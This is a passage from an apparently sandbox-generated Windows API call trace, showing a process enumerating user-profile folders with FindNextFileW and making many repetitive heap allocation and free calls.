(in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7460 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.405] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc48 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.406] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc80 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.406] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edcb8 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.406] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.406] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x498) returned 0x325d8f0 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda80 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7d10 [0227.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ce8 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7cc0 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c98 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c70 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c48 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c20 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7bf8 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7f18 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7f40 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7f68 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7f90 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7fb8 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7fe0 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f8008 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f8030 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edcf0 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edd28 [0227.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edd60 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8c8 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9e0 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7bd0 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7ba8 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7b80 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7b58 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7b30 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7d38 | out: hHeap=0x630000) returned 1 [0227.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7d60 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7d88 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7db0 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7dd8 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7e00 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7e28 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7e50 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7e78 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7ea0 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7ec8 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7ef0 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed878 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edad0 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda08 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7460 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc48 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb8 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d5d8 | out: hHeap=0x630000) returned 1 [0227.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edcb8 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc10 | out: hHeap=0x630000) returned 1 [0227.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.408] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0227.408] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.409] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb30 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8f0 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed918 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edba0 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbd8 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed940 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.411] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 